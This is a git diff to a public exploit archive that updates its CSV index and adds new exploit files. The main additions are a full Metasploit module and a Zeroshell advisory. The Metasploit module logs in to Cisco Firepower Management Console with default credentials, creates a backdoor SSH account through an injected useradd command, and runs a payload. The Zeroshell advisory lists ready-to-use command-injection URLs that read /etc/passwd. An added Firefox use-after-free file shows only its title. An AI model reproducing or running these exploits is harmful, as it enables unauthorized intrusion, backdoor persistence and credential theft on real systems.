diff --git a/files.csv b/files.csv
index 5f103298b..03c2cc7e0 100644
--- a/files.csv
+++ b/files.csv
@@ -5340,6 +5340,7 @@ id,file,description,date,author,platform,type,port
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
+41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use After Free",2017-01-13,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15217,6 +15218,7 @@ id,file,description,date,author,platform,type,port
40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
+41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -20445,24 +20447,24 @@ id,file,description,date,author,platform,type,port
7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
-7699,platforms/php/webapps/7699.txt,"QuoteBook - 'poll.inc' Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0
+7699,platforms/php/webapps/7699.txt,"QuoteBook - Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0
7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution (Administrator Required)",2009-01-08,StAkeR,php,webapps,0
-7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
-7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
+7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
+7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
-7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
+7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7718,platforms/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0
-7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
+7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
-7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
-7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
+7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - 'id_animateur' Parameter Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
+7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - SQL Injection",2009-01-11,stylextra,php,webapps,0
7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0
7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0
-7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
-7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
+7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - SQL Injection",2009-01-11,FasTWORM,php,webapps,0
+7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
@@ -36978,3 +36980,4 @@ id,file,description,date,author,platform,type,port
41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
+41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
diff --git a/platforms/linux/remote/41041.rb b/platforms/linux/remote/41041.rb
new file mode 100755
index 000000000..7ce22eac5
--- /dev/null
+++ b/platforms/linux/remote/41041.rb
@@ -0,0 +1,294 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Remote::SSH
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability found in Cisco Firepower Management Console.
+ The management system contains a configuration flaw that allows the www user to
+ execute the useradd binary, which can be abused to create backdoor accounts.
+ Authentication is required to exploit this vulnerability.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Matt', # Original discovery & PoC
+ 'sinn3r' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2016-6433' ],
+ [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'Targets' =>
+ [
+ [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 10 2016',
+ 'CmdStagerFlavor'=> %w{ echo },
+ 'DefaultOptions' =>
+ {
+ 'SSL' => 'true',
+ 'SSLVersion' => 'Auto',
+ 'RPORT' => 443
+ },
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ # admin:Admin123 is the default credential for 6.0.1
+ OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
+ OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
+ OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
+ OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
+ OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
+ OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
+ ], self.class)
+ end
+
+ def check
+ # For this exploit to work, we need to check two services:
+ # * HTTP - To create the backdoor account for SSH
+ # * SSH - To execute our payload
+
+ vprint_status('Checking Cisco Firepower Management console...')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
+ })
+
+ if res && res.code == 200
+ vprint_status("Console is found.")
+ vprint_status("Checking SSH service.")
+ begin
+ ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ Net::SSH.start(rhost, 'admin',
+ port: datastore['SSHPORT'],
+ password: Rex::Text.rand_text_alpha(5),
+ auth_methods: ['password'],
+ non_interactive: true
+ )
+ end
+ rescue Timeout::Error
+ vprint_error('The SSH connection timed out.')
+ return Exploit::CheckCode::Unknown
+ rescue Net::SSH::AuthenticationFailed
+ # Hey, it talked. So that means SSH is running.
+ return Exploit::CheckCode::Appears
+ rescue Net::SSH::Exception => e
+ vprint_error(e.message)
+ end
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def get_sf_action_id(sid)
+ requirements = {}
+
+ print_status('Attempting to obtain sf_action_id from rulesimport.cgi')
+
+ uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => "CGISESSID=#{sid}"
+ })
+
+ unless res
+ fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
+ end
+
+ sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]
+
+ unless sf_action_id
+ fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
+ end
+
+ sf_action_id
+ end
+
+ def create_ssh_backdoor(sid, user, pass)
+ uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+ sf_action_id = get_sf_action_id(sid)
+ sh_name = 'exploit.sh'
+
+ print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")
+
+ mime_data = Rex::MIME::Message.new
+ mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
+ mime_data.add_part('file', nil, nil, 'form-data; name="source"')
+ mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
+ mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
+ mime_data.add_part(
+ "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
+ 'application/octet-stream',
+ nil,
+ "form-data; name=\"file\"; filename=\"#{sh_name}\""
+ )
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => "CGISESSID=#{sid}",
+ 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",
+ 'data' => mime_data.to_s,
+ 'vars_get' => { 'no_mojo' => '1' },
+ })
+ end
+
+ def generate_new_username
+ datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
+ end
+
+ def generate_new_password
+ datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
+ end
+
+ def report_cred(opts)
+ service_data = {
+ address: rhost,
+ port: rport,
+ service_name: 'cisco',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ origin_type: :service,
+ module_fullname: fullname,
+ username: opts[:user],
+ private_data: opts[:password],
+ private_type: :password
+ }.merge(service_data)
+
+ login_data = {
+ last_attempted_at: DateTime.now,
+ core: create_credential(credential_data),
+ status: Metasploit::Model::Login::Status::SUCCESSFUL,
+ proof: opts[:proof]
+ }.merge(service_data)
+
+ create_credential_login(login_data)
+ end
+
+ def do_login
+ console_user = datastore['USERNAME']
+ console_pass = datastore['PASSWORD']
+ uri = normalize_uri(target_uri.path, 'login.cgi')
+
+ print_status("Attempting to login in as #{console_user}:#{console_pass}")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' => {
+ 'username' => console_user,
+ 'password' => console_pass,
+ 'target' => ''
+ }
+ })
+
+ unless res
+ fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
+ end
+
+ res_cookie = res.get_cookies
+ if res.code == 302 && res_cookie.include?('CGISESSID')
+ cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
+ print_status("CGI Session ID: #{cgi_sid}")
+ print_good("Authenticated as #{console_user}:#{console_pass}")
+ report_cred(username: console_user, password: console_pass)
+ return cgi_sid
+ end
+
+ nil
+ end
+
+ def execute_command(cmd, opts = {})
+ @first_exec = true
+ cmd.gsub!(/\/tmp/, '/usr/tmp')
+
+ # Weird hack for the cmd stager.
+ # Because it keeps using > to write the payload.
+ if @first_exec
+ @first_exec = false
+ else
+ cmd.gsub!(/>>/, ' > ')
+ end
+
+ begin
+ Timeout.timeout(3) do
+ @ssh_socket.exec!("#{cmd}\n")
+ vprint_status("Executing #{cmd}")
+ end
+ rescue Timeout::Error
+ fail_with(Failure::Unknown, 'SSH command timed out')
+ rescue Net::SSH::ChannelOpenFailed
+ print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
+ retry
+ end
+ end
+
+ def init_ssh_session(user, pass)
+ print_status("Attempting to log into SSH as #{user}:#{pass}")
+
+ factory = ssh_socket_factory
+ opts = {
+ auth_methods: ['password', 'keyboard-interactive'],
+ port: datastore['SSHPORT'],
+ use_agent: false,
+ config: false,
+ password: pass,
+ proxy: factory,
+ non_interactive: true
+ }
+
+ opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+ begin
+ ssh = nil
+ ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ @ssh_socket = Net::SSH.start(rhost, user, opts)
+ end
+ rescue Net::SSH::Exception => e
+ fail_with(Failure::Unknown, e.message)
+ end
+ end
+
+ def exploit
+ # To exploit the useradd vuln, we need to login first.
+ sid = do_login
+ return unless sid
+
+ # After login, we can call the useradd utility to create a backdoor user
+ new_user = generate_new_username
+ new_pass = generate_new_password
+ create_ssh_backdoor(sid, new_user, new_pass)
+
+ # Log into the SSH backdoor account
+ init_ssh_session(new_user, new_pass)
+
+ begin
+ execute_cmdstager({:linemax => 500})
+ ensure
+ @ssh_socket.close
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/linux/webapps/41040.txt b/platforms/linux/webapps/41040.txt
new file mode 100755
index 000000000..950490bc2
--- /dev/null
+++ b/platforms/linux/webapps/41040.txt
@@ -0,0 +1,71 @@
+####################################################################################################################################
+# Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE
+# Date: 13.01.2017
+# Exploit Author: Ozer Goker
+# Vendor Homepage: http://www.zeroshell.org
+# Software Link: www.zeroshell.org/download/
+# Version: 3.6.0 & 3.7.0
+####################################################################################################################################
+
+Introduction
+
+Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.
+
+
+Vulnerabilities: Unauthenticated Remote Code Execution | RCE
+
+
+RCE details:
+
+####################################################################################################################################
+
+RCE 1
+
+URL
+http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=
+
+METHOD
+Get,Post
+
+PARAMETER
+User
+
+PAYLOAD
+%27%26cat%20/etc/passwd%26%27
+
+
+####################################################################################################################################
+
+RCE 2
+
+URL
+http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27
+
+METHOD
+Get
+
+PARAMETER
+x509type
+
+PAYLOAD
+%27%26cat%20/etc/passwd%26%27
+
+
+####################################################################################################################################
+
+RCE 3
+
+URL
+http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22
+
+METHOD
+Get
+
+PARAMETER
+type
+
+PAYLOAD
+%22%26cat%20/etc/passwd%26%22
+
+
+####################################################################################################################################
diff --git a/platforms/windows/dos/41042.html b/platforms/windows/dos/41042.html
new file mode 100755
index 000000000..b5330334b
--- /dev/null
+++ b/platforms/windows/dos/41042.html
@@ -0,0 +1,107 @@
+
+
+
+
+
+
+
+
+
+
+
+
+ Firefox < 50.1.0 Use After Free (CVE-2016-9899)
+
+
+
+
+
+